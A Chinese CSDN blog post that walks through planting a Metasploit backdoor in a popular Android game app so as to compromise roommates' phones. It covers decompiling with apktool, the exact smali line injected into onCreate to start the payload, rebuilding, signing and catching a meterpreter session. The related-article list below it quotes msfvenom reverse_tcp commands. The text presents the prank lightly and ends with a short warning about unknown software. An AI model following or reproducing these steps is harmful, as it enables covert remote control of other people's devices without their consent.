突发奇想对某某天堂进行后门植入,反弹msf

最新推荐文章于 2024-04-10 19:55:19 发布
最新推荐文章于 2024-04-10 19:55:19 发布
阅读量1.6k 收藏 6
点赞数 8
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43088273/article/details/126550406
版权

咱们寝室基本人手一个某某天堂,所以打算安排一下室友,感觉自己好邪恶ƪ(˘⌣˘)ʃ优雅。
首先msf生成木马文件muma.apk
在这里插入图片描述
然后对某某天堂和木马apk进行反编译,我这里用的是apktool:
在这里插入图片描述
然后得到两个文件夹
在这里插入图片描述
打开JMX找到AndroidManifest.xml文件打开,找到软件入口,软件入口一般在android.intent.action.MAIN的上面
在这里插入图片描述
软件入口:
在这里插入图片描述
找到入口对应的smali文件(软件入口把点换成/就能找到对应的smali文件)
在这里插入图片描述
直接搜索onCreat函数,找到bundle对象,你并在下面添加启动payload代码:invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
在这里插入图片描述
添加好后把payload的smail/com/metasploit文件复制到某某天堂的smail_classes2/com/目录下
在这里插入图片描述
然后用apktool进行编译:
在这里插入图片描述
签名:
在这里插入图片描述
手机进行安装:
在这里插入图片描述
手机能正常安装,也不管有没有报毒毕竟哪家H不报毒呢ƪ(˘⌣˘)ʃ优雅,lsp们还不是照样安装。
电脑打开msf进行监听:
在这里插入图片描述
手机打开软件:
在这里插入图片描述
msf成功上线:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
能正常执行命令。
所以兄弟们千万不要下载来路不明的软件,如果非要使用可以用vmos虚拟机打开。结束♥(。→v←。)♥

吊猫
关注
  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
实用教程:手动安卓应用中注入msf后门
weixin_34221036的博客
09-14 2599
本文讲的是实用教程:手动安卓应用中注入msf后门,在移动安全评估中,我们尝试将一些常用的应用程序加载上后门,并且加上后门之后应用程序毫无异常。这就可以用来证明如果使用的应用程序被种上后门,使用者会毫无知觉。 步骤一:生成攻击载荷 metasploit中的msfvenom可以生成多种类型的攻击载荷,当然我们也可以使用它来生成一个包含msf后门的apk。...
对Android应用植入后门 实现msf控制(附带所需工具和常见坑解决办法)
weixin_72849553的博客
12-21 2237
本人刚入msf坑不久,对于Android的渗透比较感兴趣,于是在网上寻找了很久资料,但是发现很多实现方法都会出现各种奇怪报错,于是我花了点时间,在外面的世界找解决方案,总算实现成功,故整理文章,供正在困惑和迷茫中挣扎的小伙伴们互相交流。下面进入正题:我们的思路是对一个安卓应用注入msf生成的payload后门,并实现内网范围或是外网范围内的持续控制,这样就会实现后门随正常应用启动,但不易被发现。文中会提供一些思路拓展,如果需要,我可以再展开来讲。
kali使用msf+apkhook520+cploar实现安卓手的攻击
CvtNhso的博客
04-10 2588
学习网络安全的过程中,突发奇想怎么才能控制或者说是攻击手机边找工作边实验话不多说启动kali。
Kali Linux利用MSF入侵安卓手机
weixin_42916109的博客
06-06 6225
参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击,只要靶机安装了后门软件用什么方法都可以,直接run开始执行攻击也行。我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面。解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令。提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可。
msf-Msfvenonm生成后门木马
热门推荐
weixin_45588247的博客
08-27 1万+
msf-Msfvenonm生成后门木马实验 文章目录msf-Msfvenonm生成后门木马实验一、工具:二、实验环境:三、`msfvenom`简介:四、各平台生成木马的方法:五、生成反向反弹木马:1. windows平台:1.1 生成反弹木马:1.2 捆绑一个程序伪装木马:2. :3. :4. :1.1 :2.1 :五、实验过程:1. :1.1 :1.1.1 : 一、工具: Metasploit Framework(MSF)漏洞利用框架 二、实验环境: 靶   机: windows10虚拟机:192.
我的MSF之Android木马渗透的学习笔记
yuan_boss的博客
06-07 4466
使用kali制作Android木马并进行通讯录渗透的学习笔记
msfvenom & msfconsole——msfvenom生成木马入侵WinServer2008及Android手机
Ho1aAs‘s Blog
07-29 6208
文章目录一、使用环境二、msfvenom编写Trojan木马Ⅰ、电脑端.exe格式Ⅱ、移动端.apk格式三、msfconsole控制感染对象Ⅰ、电脑端示例:`shell`获取Windows的CMDⅡ、移动端示例:`webcam_stream`获取Android摄像头实时画面完 免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关 请遵守我国法律法规 一、使用环境 VMware V15.5.0 Kali-Linux-2020.2 msfconsole msfvenom Windows Se
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
70-70.渗透测试-kali更新msf.mp4
最新发布
05-10
70-70.渗透测试-kali更新msf.mp4
项目管理利刃之MSF
03-03
本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目的参与者,如项目经理、开发工程师、系统架构师、顾问、质量管理人员等,想找到项目管理中遇到问题的解决方案,相信本文会给您一定的帮助。MSF为成功...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
linux系统安装msf的过程详解
09-14
在Linux系统中安装Metasploit Framework(MSF)是一个重要的步骤,对于网络安全研究...通过这些步骤,你可以顺利地在Linux环境中搭建起MSF环境,进行安全测试和研究。记得在使用时遵循合法和道德的准则,避免非法入侵。
[一颗花生](仅供学习)纯手工注入msf安卓木马实现捆绑。
2301_77111744的博客
07-01 794
【[一颗花生](仅供学习)纯手工注入msf安卓木马实现捆绑。-- 连接WLAN网络和断开连接 -->-- 新建/修改/删除通话记录 -->-- 读取手机状态和身份 -->-- 查看WLAN连接 -->-- 接收讯息(短信) -->-- 请求忽略电池优化 -->-- 修改您的通讯录 -->-- 拍摄照片和视频 -->-- 查看网络连接 -->-- 修改系统设置 -->-- 读取通话记录 -->-- 防止手机休眠 -->-- 读取联系人 -->-- 发送短信 -->-- 拨打电话 -->
Metasploit后门攻击android
2301_77778745的博客
04-26 411
之后攻击便完成了,这时候返回一个meterpreter可以执行各种命令,可以通过’?‘来进行辅助获得更多的帮助信息。接着在终端里输入/etc/init.d/apache2 start 启动apache服务。/var/www/html是生成木马的路径,也是kali 2.0的web服务器路径。注意要把LHOST 和LPORT 设置成刚才配置木马程序的IP和端口。确认无误后,便可以开始监听,使用。LHOST对应的是本机的ip地址。LPORT对于你要监听的端口。
APP渗透—查脱壳、反编译、重打包签名
剁椒鱼头没剁椒的博客
04-27 7264
在之前的文章都主要都是对APK文件进行信息收集,而信息收集后就需要对APP漏洞进行挖掘,但是从本质上来看,APP其实就是将原先应该部署在网站上的页面塞入APP中,所有的调用都是给予服务器,而且在对WEB漏洞进行挖掘的时候,除了部分漏洞是基于本地页面所导致的,其它的可以说基本上就是由于服务端的问题。
免杀对抗-java语言-shellcode免杀-源码修改+打包exe
xiaoheizi的博客
09-21 1040
命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar。1.点击启动jd-gui,将生成的msf.jar拖入其中进行反编译,点击file—save all sources导出反编译后的内容。1.将exe4j打包的exe程序再使用inno工具和jdk环境打包合并到一起,将文件上传目标系统,成功绕过检测。命令:jar cvfm 名称.jar META-INF/MANIFEST.MF .
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3075
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8344
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
msf反弹shell
07-28
回答: 反弹shell是一种利用Metasploit Framework (MSF)进行攻击的技术。它的原理是在目标主机上执行一个经过精心构造的客户端,使目标主机主动连接攻击者的机器的某个端口。使用MSF进行反弹shell的过程如下:首先使用msfvenom模块生成一个被控端的客户端文件,具体命令如下:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx(攻击机IP) lport=xxxx(监听端口)-f exe -o xx.exe。然后将生成的被控端文件放到目标主机内,并在目标主机内执行。此时,攻击者的机器就可以收到目标主机的session,在MSF中使用sessions命令即可查看当前收到的session,并使用session 1命令获取第一个session的会话,然后使用meterpreter模块中的shell命令即可实现反弹shell。\[1\] #### 引用[.reference_title] - *1* *3* [使用msf进行反弹shell+内网渗透](https://blog.csdn.net/JSMaster01/article/details/85402292)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [msf反弹shell](https://blog.csdn.net/weixin_34179762/article/details/93196297)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值